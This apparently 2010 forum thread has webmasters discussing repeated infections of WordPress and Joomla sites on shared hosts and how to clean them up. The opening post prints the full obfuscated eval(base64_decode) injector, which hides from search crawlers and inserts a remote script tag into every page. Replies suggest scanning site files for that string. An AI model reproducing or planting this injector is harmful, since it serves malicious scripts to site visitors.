my site with wordpress and host at godaddy was hacked every php have ineffect with the following codes eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtbCcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJvdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk5clpHcHJabXB6YTJSbWFteHphMlJxWmk1amIyMHZhM0F1Y0dod0lqNDhMM05qY21sd2REND0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgICAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOERDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4OTM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgICAgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QTlDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSkrMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocigwKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAgICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAgICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldHVybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICAgICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLickMScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?> Code (markup): i clean it again and again also changed my ftp site pwd ,but it was hacked again after about 3 days later , any suggestions
everyone blames the host... it's the easiest way out. Change your passwords, scan your computer for viruses, and start using scp or sftp. Also, request logs from /var/log/messages of your username (assuming you're linux) and have the host block any ips from the server that aren't from your IP or if you have one your developer's.
yeah, whether it's your own server or not makes no difference. If it was your own server, it would be much worse. I've dealt with thousands, not exaggerating, of these cases. I don't care who your host is, it's your problem. If your don't believe me, I can give a wonderful explanation but I digress. I hate godaddy and would never stick up for them, so know that.
No, it was a problem at Godaddy. Sites with the latest version of Wordpress (or just running simple HTML sites) AND using strong passwords got hacked. Their shared server got a problem that allowed their clients to get infected (similar to what happened to Netsol a few weeks ago). Don't blame the user, when they are doing their job. More info: http://blog.sucuri.net/2010/05/second-round-of-godaddy-sites-hacked.html But I agree, it is your site and if something happens you are the one that have to deal with it. *Btw, If you are looking for a way to scan your site for malware, check: http://sucuri.net
That's what you get for using massive wide things, once a 0day vulnerability comes out, you can expect your site to get hit sooner or later most small sites will never incur this bcause they are not known.. My site gets at least a few hundred hacking attempts daily, If you secure your software and server you shouldn't have to worry about anything.
its the godaddy which got hacked,i m having a client of mine who was hosted there and have been infected with same kind of virus twice,so it is basiclly godaddy host
Old (vulnerable) version of WordPress or trojan still inside your computer having full access 2 FTP client. First step is ensure computer security, next, change FTP/site access passwords, then restore installation from backup (if it's present) or reinstall a new. It has nothing to do with GoDaddy, a problem is at your side. Was your WP templates clean from virus before install?
It's not just godaddy. I'm on Dreamhost and also had this added to all my php files. I think I managed to clean it all up using SSH but I don't think it was just me because dreamhost sent out an email to infected people with instructions on how to clean it up. They (dreamhost) also changed the passwords for the infected users to stop us from getting infected again. By the way!! If you've been infected check your main domain for a folder called .files. They seemed to have uploaded a ton of html articles. For cleanup Sucuri has an SSH command you can use or a php wordpress fix that you can run. (and yes, I ran a virus/malware scan on my computer. That's the first thing I did because I thought it was just me)
My site has also been hacked every week 3 times now. I'm hosted on godaddy too. I have followed all steps to protect and remove the eval code but it keeps coming back. I wonder if there is away to scan databases to find malicious code.
Hi Craig, same problem (shared linux server hosted with GoDaddy) running Joomla. Any word on if you've found a way to scan the database for malicious code?
Here's a quick fix that seems to have helped me out. I don't know what's causing the coding to reappear, but this seemed to remove it without any major issues. http://blog.sucuri.net/2010/05/simple-cleanup-solution-for-latest.html
I just exported my database and looked for keywords in wordpad with the find tool. I never found anything though and not really sure what to look for apart from "eval" lol
These hacks have been occuring for months , and it affects Dreamhost, Network Solutions and Godaddy at the very least. The only difference betwen those hosts is that Godaddy prefers to put the blame on their customers, or anything else they can find instead of actually doing something about it and securing their servers. Dreamhost and Network Solutions both accepted that they had server problems, Godaddy are either too blind or too arrogant to accept any responsibility for their own insecurities. Godaddy should stop putting it's head in the sand and stop blaming the victims.
You should scan all your files for the string: eval(base64_decode(... If you're on a PC you can download grepWin and scan for that string after you download the entire site to your computer.